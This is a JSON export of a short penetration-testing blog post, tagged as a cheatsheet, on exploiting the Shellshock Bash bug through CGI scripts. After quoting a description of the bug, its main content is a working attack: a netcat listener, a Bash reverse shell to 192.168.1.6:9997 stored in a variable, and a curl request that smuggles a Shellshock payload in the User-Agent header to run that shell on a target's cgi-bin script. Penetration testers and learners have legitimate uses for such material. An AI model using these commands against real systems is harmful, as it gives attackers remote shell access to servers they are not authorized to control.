{"id":330,"date":"2021-05-04T16:34:53","date_gmt":"2021-05-04T16:34:53","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=330"},"modified":"2021-07-15T03:02:46","modified_gmt":"2021-07-15T03:02:46","slug":"shellshock","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/shellshock\/","title":{"rendered":"Shellshock."},"content":{"rendered":"\n<div class=\"wp-block-cover has-background-dim\"><img loading=\"lazy\" decoding=\"async\" width=\"1788\" height=\"1007\" class=\"wp-block-cover__image-background wp-image-331\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/05\/shellshock.jpeg\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\">The Hacker's Dream Shell. (<em>once upon a time<\/em>)<\/p>\n<\/div><\/div>\n\n\n\n<p id=\"shellshock\"><strong>\"Shellshock<\/strong>, also known as&nbsp;<strong>Bashdoor<\/strong>,&nbsp;is a family of&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Security_bug\">security bugs<\/a>&nbsp;in the&nbsp;Unix Bash shel<a href=\"https:\/\/en.wikipedia.org\/wiki\/Shell_(computing)\">l<\/a>, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Arbitrary_code_execution\">execute arbitrary commands<\/a>&nbsp;and gain unauthorized access&nbsp;to many Internet-facing services, such as web servers, that use Bash to process requests.<strong>\"<\/strong><br><br><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"225\" class=\"wp-image-333\" style=\"width: 400px;\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/05\/yeah.gif\" alt=\"\"><\/p>\n\n\n\n<p>If you're on an engagement and you discover some \/cgi-bin\/ directory - it would be wise to fuzz for file names + \".cgi\". Checking for CGI files either left behind from a default configuration or perhaps a developer who was utilizing it for debugging purposes is an important thing to check for. <br><br>Lets suppose you found something like \/<strong>cgi-bin<\/strong>\/<strong>superadmin.cgi<\/strong> during your engagement. The first thing that should come to your mind is \"<em>I wonder if it's shellshock vulnerable?<\/em>\". <br><br>nc -nlvp 9997<br>export <strong>CMD<\/strong>=\"bash -i &gt;&amp; \/dev\/tcp\/192.168.1.6\/9997 0&gt;&amp;1\"<br>curl -H \"User-Agent: () { :; }; \/bin\/bash -c 'echo aaaa; ${<strong>CMD<\/strong>}; echo zzzz;'\" http:\/\/example.com\/<strong>cgi-bin<\/strong>\/<strong>superadmin.cgi<\/strong><br><br><em>Shell.<\/em><br><br><strong>Here's a great reference if you want to learn more about how it works:<\/strong><br><a href=\"https:\/\/www.troyhunt.com\/everything-you-need-to-know-about2\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.troyhunt.com\/everything-you-need-to-know-about2\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\"Shellshock, also known as&nbsp;Bashdoor,&nbsp;is a family of&nbsp;security bugs&nbsp;in the&nbsp;Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to&nbsp;execute arbitrary commands&nbsp;and gain unauthorized access&nbsp;to many Internet-facing services, such as web servers, that use Bash to process requests.\" If you're on an engagement and you [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":331,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[57,4,58,56],"class_list":["post-330","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-cheatsheet","tag-s1ren","tag-shell-shock-attack","tag-shellshock"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=330"}],"version-history":[{"count":2,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":413,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/330\/revisions\/413"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/331"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}